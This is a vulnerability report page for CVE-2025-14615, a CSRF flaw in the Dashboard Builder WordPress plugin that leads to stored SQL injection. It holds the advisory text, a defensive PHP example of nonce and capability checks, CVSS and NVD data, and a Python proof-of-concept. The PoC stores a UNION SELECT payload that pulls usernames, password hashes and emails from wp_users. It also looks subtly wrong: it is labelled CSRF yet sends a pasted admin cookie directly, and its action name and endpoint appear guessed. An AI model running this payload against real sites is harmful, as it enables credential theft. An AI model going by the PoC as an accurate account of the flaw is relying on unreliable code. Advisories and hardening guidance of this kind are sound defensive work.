Security Vulnerability Report
CVE-2025-14615 CVSS 7.1 HIGH

Published: 2026-01-14 06:15:53
Last Modified: 2026-04-15 00:35:42

Description

The DASHBOARD BUILDER – WordPress plugin for Charts and Graphs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.7. This is due to missing nonce validation on the settings handler in dashboardbuilder-admin.php. This makes it possible for unauthenticated attackers to modify the stored SQL query and database credentials used by the [show-dashboardbuilder] shortcode via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. The modified SQL query is subsequently executed on the front-end when the shortcode is rendered, enabling arbitrary SQL injection and data exfiltration through the publicly visible chart output.
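
The root cause named above is CWE-352: the settings handler accepts a POST from any origin because it never verifies a WordPress nonce. The following PHP is an added illustrative example of how a plugin settings handler is normally hardened against this; it is not the Dashboard Builder plugin's own code, and the option name (`example_db_settings`), the action name (`example_db_save_settings`), the field names and the `admin_post_*` hook are assumptions made for the example. The WordPress functions used (`wp_nonce_field`, `check_admin_referer`, `current_user_can`, `update_option`) are real core APIs.

```php
<?php
/*
 * Added example (not the plugin's code): a settings form plus its handler
 * with the two checks a forged cross-site request cannot pass.
 * All option/action/field names below are assumptions for illustration.
 */

// Settings form: emits a hidden _wpnonce field tied to one specific action.
// A third-party page cannot read this value, so it cannot forge the form.
function example_db_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <?php wp_nonce_field( 'example_db_save_settings' ); ?>
        <input type="hidden" name="action" value="example_db_save_settings">
        <label>DB host <input type="text" name="db_host"></label>
        <label>Query <textarea name="sql_query"></textarea></label>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

// Handler: runs for the admin-post action declared in the form above.
function example_db_save_settings() {
    // 1. Capability check: only users allowed to manage options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }

    // 2. Nonce check: check_admin_referer() dies with a 403 unless the
    //    request carries a valid nonce for this action. This is the check
    //    whose absence makes a settings handler CSRF-able.
    check_admin_referer( 'example_db_save_settings' );

    // 3. Sanitize before storing (wp_unslash undoes WordPress' magic quotes).
    $settings = array(
        'db_host'   => sanitize_text_field( wp_unslash( $_POST['db_host'] ?? '' ) ),
        'db_name'   => sanitize_text_field( wp_unslash( $_POST['db_name'] ?? '' ) ),
        'db_user'   => sanitize_text_field( wp_unslash( $_POST['db_user'] ?? '' ) ),
        'db_pass'   => (string) wp_unslash( $_POST['db_pass'] ?? '' ),
        'sql_query' => (string) wp_unslash( $_POST['sql_query'] ?? '' ),
    );
    update_option( 'example_db_settings', $settings );

    // Redirect back to the settings page after a successful save.
    wp_safe_redirect( add_query_arg( 'updated', '1', wp_get_referer() ) );
    exit;
}
add_action( 'admin_post_example_db_save_settings', 'example_db_save_settings' );
```

The nonce check must sit on the handler that performs the write, not only on the page that renders the form, since the forged request goes straight to the handler. Note also that fixing the CSRF does not change the fact that a free-form SQL query stored by an administrator is later executed on the front end; that remains a sensitive setting even when only a legitimately authenticated administrator can change it.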

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Dashboard Builder WordPress plugin, all versions up to and including 1.5.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-14615 PoC - CSRF to SQL Injection in Dashboard Builder WordPress Plugin
# This PoC demonstrates how an attacker can exploit missing CSRF protection
# to inject malicious SQL queries via the settings handler

TARGET_URL = "http://target-wordpress-site.com"
ADMIN_COOKIE = "wordpress_logged_in_cookie_here"


def create_csrf_payload():
    """
    Generate malicious request to modify SQL query in dashboard builder settings.
    The injected SQL can be used to exfiltrate data from the database.
    """
    # Malicious SQL injection payload
    # This payload attempts to extract user credentials from wp_users table
    malicious_sql = "UNION SELECT 1,user_login,user_pass,user_email,5,6,7,8,9,10 FROM wp_users--"

    payload = {
        'action': 'dashboard_builder_save_settings',
        'db_host': 'localhost',
        'db_name': 'wordpress_db',
        'db_user': 'wp_user',
        'db_pass': 'password',
        'sql_query': malicious_sql,
        'nonce': ''  # Missing nonce validation allows CSRF attack
    }
    return payload


def exploit_csrf():
    """
    Send CSRF attack to modify dashboard builder settings.
    Requires admin interaction (tricking admin into clicking link).
    """
    admin_url = f"{TARGET_URL}/wp-admin/admin.php?page=dashboard-builder-settings"
    headers = {
        'Cookie': ADMIN_COOKIE,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    payload = create_csrf_payload()

    print("[*] Sending CSRF payload to modify dashboard builder settings...")
    print(f"[*] Target: {admin_url}")
    print(f"[*] Payload: {payload['sql_query']}")

    try:
        response = requests.post(
            admin_url,
            data=payload,
            headers=headers,
            timeout=30
        )
        print(f"[+] Response Status: {response.status_code}")
        if response.status_code == 200:
            print("[+] Settings modified successfully - SQL injection payload stored")
            print("[*] Visit page with [show-dashboardbuilder] shortcode to trigger injection")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-14615 - Dashboard Builder CSRF to SQL Injection")
    print("=" * 60)
    exploit_csrf()
```

References

https://plugins.trac.wordpress.org/browser/dashboard-builder/tags/1.5.7/dashboardbuilder-admin.php#L158
https://plugins.trac.wordpress.org/browser/dashboard-builder/tags/1.5.7/dashboardbuilder.php#L51
https://plugins.trac.wordpress.org/browser/dashboard-builder/trunk/dashboardbuilder-admin.php#L158
https://plugins.trac.wordpress.org/browser/dashboard-builder/trunk/dashboardbuilder.php#L51
https://www.wordfence.com/threat-intel/vulnerabilities/id/106b31ed-d509-4551-a134-02193ab22fe1?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-14615", "sourceIdentifier": "[email protected]", "published": "2026-01-14T06:15:53.050", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The DASHBOARD BUILDER – WordPress plugin for Charts and Graphs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.7. This is due to missing nonce validation on the settings handler in dashboardbuilder-admin.php. This makes it possible for unauthenticated attackers to modify the stored SQL query and database credentials used by the [show-dashboardbuilder] shortcode via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The modified SQL query is subsequently executed on the front-end when the shortcode is rendered, enabling arbitrary SQL injection and data exfiltration through the publicly visible chart output."}, {"lang": "es", "value": "El plugin de WordPress DASHBOARD BUILDER – plugin para Gráficos y Cuadros es vulnerable a falsificación de petición en sitios cruzados en todas las versiones hasta la 1.5.7, inclusive. Esto se debe a la falta de validación de nonce en el manejador de configuraciones en dashboardbuilder-admin.php. Esto hace posible que atacantes no autenticados modifiquen la consulta SQL almacenada y las credenciales de la base de datos utilizadas por el shortcode [show-dashboardbuilder] a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace. La consulta SQL modificada se ejecuta posteriormente en el front-end cuando se renderiza el shortcode, lo que permite la inyección SQL arbitraria y la exfiltración de datos a través de la salida del gráfico visible públicamente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/dashboard-builder/tags/1.5.7/dashboardbuilder-admin.php#L158", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/dashboard-builder/tags/1.5.7/dashboardbuilder.php#L51", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/dashboard-builder/trunk/dashboardbuilder-admin.php#L158", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/dashboard-builder/trunk/dashboardbuilder.php#L51", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/106b31ed-d509-4551-a134-02193ab22fe1?source=cve", "source": "[email protected]"}]}}
```